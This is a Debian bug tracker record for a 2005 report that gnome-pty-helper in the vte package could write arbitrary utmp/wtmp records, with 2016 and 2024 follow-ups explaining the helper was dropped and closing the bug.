Bug#330907; Package vte. (Wed, 23 Nov 2016 21:36:06 GMT) (full text, mbox, link).


Acknowledgement sent to Egmont Koblinger <egmont@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (Wed, 23 Nov 2016 21:36:06 GMT) (full text, mbox, link).


Message #100 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Egmont Koblinger <egmont@gmail.com>
To: 330907@bugs.debian.org, 329156@bugs.debian.org
Subject: Re: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Wed, 23 Nov 2016 22:33:13 +0100
FYI:

VTE (Debian package name: libvte-2.91-0) no longer ships gnome-pty-helper
as of version 0.42.

VTE, and in turn gnome-terminal, no longer does utmp/wtmp logging at all.

See https://git.gnome.org/browse/vte/commit/?id=299c700 and
https://bugzilla.gnome.org/show_bug.cgi?id=747046 for further details.

cheers,
egmont

Reply sent to Simon McVittie <smcv@debian.org>:
You have taken responsibility. (Thu, 19 Sep 2024 18:09:22 GMT) (full text, mbox, link).


Notification sent to Paul Szabo <psz@maths.usyd.edu.au>:
Bug acknowledged by developer. (Thu, 19 Sep 2024 18:09:22 GMT) (full text, mbox, link).


Message #105 received at 330907-done@bugs.debian.org (full text, mbox, reply):

From: Simon McVittie <smcv@debian.org>
To: 330907-done@bugs.debian.org
Subject: Re: Bug#330907: gnome-pty-helper: writes arbitrary utmp records
Date: Thu, 19 Sep 2024 19:08:00 +0100
Version: 1:0.28.2-6

On Tue, 20 Sep 2005 at 09:01:20 +1000, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records

Since 2019 (before Debian 11), the vte source package in Debian no longer
installs gnome-pty-helper, so any remaining bugs in gnome-pty-helper
are no longer relevant to its security posture.

For all purposes except the GTK2-based Debian installer, vte has been
replaced by the GTK3/GTK4-based vte2.91, but that package also stopped
providing gnome-pty-helper in 2015 (version 0.42.0-1).

libzvt was also removed from Debian, back in 2008.

So there is no longer a gnome-pty-helper in any supported branch of
Debian, in any descendant of the libzvt package in which CVE-2005-0023
was originally reported, and I'm closing this bug now.

    smcv



Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 18 Oct 2024 07:24:33 GMT) (full text, mbox, link).




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 05:05:09 2025; Machine Name: buxtehude
